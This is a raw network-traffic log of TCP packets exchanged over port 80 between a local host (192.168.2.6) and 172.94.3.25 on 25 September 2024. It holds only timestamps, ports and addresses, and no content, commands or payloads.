Sep 25, 2024 16:03:23.428805113 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.428824902 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.428842068 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.428852081 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:23.428852081 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:23.428860903 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.428886890 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.428915977 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.428946018 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:23.428946018 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:23.428946972 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.428966045 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.428983927 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.429003000 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.429030895 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:23.429030895 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:23.429032087 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.429064989 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.429090977 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.429106951 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.429124117 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.429133892 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:23.429133892 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:23.429155111 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.429187059 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.429203033 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.429229975 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:23.429229975 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:23.429231882 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.429250002 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.429267883 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.429292917 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.429321051 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:23.429321051 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:23.429322958 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.429342985 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.429362059 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.429399967 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.429416895 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.429426908 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:23.429426908 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:23.429441929 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.429470062 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.429490089 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.429506063 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.429519892 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:23.429519892 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:23.429523945 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.429559946 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.429577112 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.429605007 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:23.429605007 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:23.429606915 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.429626942 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.429653883 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.429671049 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.429699898 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:23.429699898 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:23.429702044 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.429718018 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.429735899 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.429752111 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.429768085 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.429781914 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:23.429781914 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:23.429795980 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.429821968 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.429837942 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.429858923 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.429867029 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:23.429867029 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:23.429879904 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.429898024 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.429945946 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.429974079 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.429976940 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:23.429976940 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:23.429992914 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.430011034 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.430027008 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.430049896 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.430056095 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:23.430056095 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:23.430099964 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.430131912 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.430147886 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.430166006 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.430174112 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:23.430174112 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:23.430185080 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.430202007 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.430218935 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.430236101 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.430247068 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:23.430247068 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:23.430265903 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.430285931 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.430301905 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.430316925 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.430325985 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.430346012 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.430350065 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:23.430350065 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:23.430356979 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.430366993 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:23.430367947 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.430380106 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.430393934 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.430403948 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.430414915 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.430425882 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.430445910 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.430447102 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:23.430447102 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:23.430457115 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.430468082 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.430479050 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.430490971 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.430495024 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:23.430495024 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:23.430501938 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.430514097 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.430525064 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.430536032 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:23.430536985 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.430547953 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.430557966 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.430566072 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:23.430566072 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:23.430568933 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.430582047 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.430593014 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.430603981 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.430609941 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:23.430609941 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:23.430617094 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.430628061 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.430639982 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.430650949 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.430653095 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:23.430653095 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:23.430665016 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.430676937 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.430679083 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:23.430686951 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.430700064 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.430711031 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.430715084 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:23.430723906 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.430737019 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.430741072 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:23.430741072 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:23.430759907 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.430775881 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.430787086 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.430797100 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.430802107 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.430805922 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:23.430805922 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:23.430818081 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.430830002 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.430836916 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:23.430841923 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.430877924 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:23.430877924 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:23.431397915 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:23.517338991 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.517368078 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.517380953 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.517391920 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.517404079 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.517416000 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.517429113 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.517441034 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.517452955 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.517462969 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.517473936 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.517486095 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.517515898 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.517528057 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.517539978 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:23.517539978 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:23.517546892 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.517559052 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.517579079 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.517600060 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.517605066 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:23.517605066 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:23.517611027 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.517621994 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.517640114 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.517651081 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.517661095 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.517663956 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:23.517663956 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:23.517683029 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.517692089 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.517704010 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.517715931 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.517723083 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:23.517723083 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:23.517735958 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.517748117 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.517766953 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:23.517766953 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:23.517767906 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.517780066 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.517791033 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.517818928 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.517829895 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.517838955 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:23.517838955 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:23.517841101 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.517859936 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.517872095 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.517882109 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.517890930 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:23.517890930 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:23.517894983 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.517915964 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.517926931 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.517936945 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.517946005 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:23.517946005 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:23.517951012 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.517975092 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.517992020 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.518002987 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.518013954 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:23.518013954 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:23.518016100 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.518029928 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.518042088 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.518054962 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.518058062 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:23.518059015 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:23.518100977 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.518119097 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.518137932 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.518148899 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.518150091 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:23.518150091 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:23.518160105 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.518172026 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.518183947 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.518196106 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.518205881 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:23.518205881 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:23.518208027 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.518323898 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.518335104 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.518353939 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.518353939 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:23.518353939 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:23.518363953 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.518376112 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.518408060 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:23.518408060 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:23.518452883 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.518464088 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.518475056 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.518486023 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.518497944 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.518508911 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.518511057 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:23.518511057 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:23.518522024 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.518537998 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.518548012 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.518559933 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.518570900 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.518579960 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:23.518579960 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:23.518582106 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.518593073 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.518604994 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.518644094 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:23.518644094 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:23.518703938 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.518713951 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.518726110 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.518758059 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.518769979 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.518779993 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.518789053 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:23.518789053 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:23.518791914 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.518805027 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.518831968 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:23.518831968 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:23.518831968 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.518906116 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.518918991 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.518930912 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.518943071 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.518965006 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:23.518965006 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:23.519026041 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.519037008 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.519049883 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.519081116 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:23.519081116 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:23.519167900 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.519180059 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.519191980 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.519210100 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.519222021 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.519233942 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.519252062 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.519264936 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.519268990 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:23.519268990 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:23.519277096 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.519289017 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.519305944 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.519315958 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.519328117 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.519340992 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.519364119 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.519375086 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.519390106 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:23.519390106 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:23.519396067 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.519429922 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:23.519429922 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:23.519490957 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.519503117 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.519515038 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.519526958 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.519553900 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:23.519553900 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:23.519615889 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.522006035 CEST	49715	80	192.168.2.6	172.94.3.25
